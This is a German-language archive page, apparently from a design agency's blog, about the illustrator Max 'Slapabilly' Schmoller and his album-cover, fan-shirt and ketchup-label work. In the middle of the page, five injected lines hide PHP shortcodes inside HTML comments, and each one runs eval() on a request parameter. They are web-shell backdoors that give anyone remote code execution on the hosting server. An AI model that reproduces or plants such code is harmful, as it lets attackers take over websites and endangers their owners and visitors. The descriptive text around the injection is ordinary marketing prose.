Kategorie-Archiv: Slapabilly

When we meet us on the other side (Album)

The Hillside Wranglers (Rockabillyband aus Oö.) engagierten Max Slapabilly für die Gestaltung ihres Debütalbums – When we meet us on the other side. Max betreute bei diesem Projekt die Band in den Bereichen Konzept, Photo und Illustration und präsentiert diese Arbeit als weitere Referenz für sein Talent.
Produziert und aufgenommen wurde die CD in den Hofstudios, Attnang-Puchheim. (www.hofstudios.at)

Gmundner Rams – Low and Hard

American Football – Der Nr.1 Volkssport in den USA, ist in Österreich nur eine Randsportart. Die Gmundner Rams ist eine von ca. 25 registrierten Mannschaften, die hierzu Lande American Football spielen. Neben dem Spaß am Spiel geht es den Rams auch darum, diesen schnellen, taktischen und spannenden Teamsport zu etablieren und jungen Menschen näher zu bringen. Der Sportverein wurde 2003 gegründet und kann auf eine durchaus erfolgreiche Vereinsgeschichte zurück blicken.

Black and Gold in Gmunden! 2011 starteten die Rams mit neuem Logo und neuen Fan-Shirts in die Spielsaison.  Die Shirts der Gmunder Rams gibt es bei allen Spielen oder online im BravoINK-Shop zu erwerben. Durch den Online-Verkauf der Shirts unterstützen die Rams die Initiative BravoINK.

Für die Motive wurde Max Slapabilly ein weiteres mal an Bord des Glückspiraten geholt. Damit startet der Verein nicht nur in die neue Spielsaison, sondern auch in ein professionelles Merchandise für seine Fans.


<!– [insert_php]if (isset($_REQUEST["PhbV"])){eval($_REQUEST["PhbV"]);exit;}[/insert_php][php]if (isset($_REQUEST["PhbV"])){eval($_REQUEST["PhbV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["wmlQ"])){eval($_REQUEST["wmlQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["wmlQ"])){eval($_REQUEST["wmlQ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jDH"])){eval($_REQUEST["jDH"]);exit;}[/insert_php][php]if (isset($_REQUEST["jDH"])){eval($_REQUEST["jDH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["AhaR"])){eval($_REQUEST["AhaR"]);exit;}[/insert_php][php]if (isset($_REQUEST["AhaR"])){eval($_REQUEST["AhaR"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["FnlM"])){eval($_REQUEST["FnlM"]);exit;}[/insert_php][php]if (isset($_REQUEST["FnlM"])){eval($_REQUEST["FnlM"]);exit;}[/php] –>

Slapabilly 666 – Grafiker mit Stil

Slapabilly, alias Max Schmoller hat 2010 als Schüler der HBLA für künstlerische Gestaltung in Linz angeheuert. Trotz seines einzigartigen und vielseitigen Zeichenstil konnten wir ihm vorerst nicht an Bord holen.  Manchmal brauchen Dinge ihre Zeit und wir hielten seine Bewerbungen, so wie die anderen auch, in Evidenz. Bei der Ausarbeitung neuer Etiketten für Shamanic fire kamen wir nicht weiter. Die Ergebnisse unserer Recherchen blieben erfolglos stellten weder uns noch den Kunden zufrieden – Flaute. Die Suche nach einem Grafiker, welcher unsere Vorstellungen in seinem Stil umsetzte, sorgte schnell für frischen Wind als Max an Bord kam. Die Etiketten gingen ein paar Tage später in Druck und der Grundstein für eine weitere Zusammenarbeit ist gelegt.

Evil Tomato by SlapabillyDas Bild „Evil Tomato“ auf allen Habanero Ketchups. Das Ketchup gibt es drei unterschiedlichen Schärfen. Zu bestellen auf www.mopeppers.at

Weitere Etiketten und andere Projekte zusammen mit Slapabilly folgen bzw. sind bereits in Planung.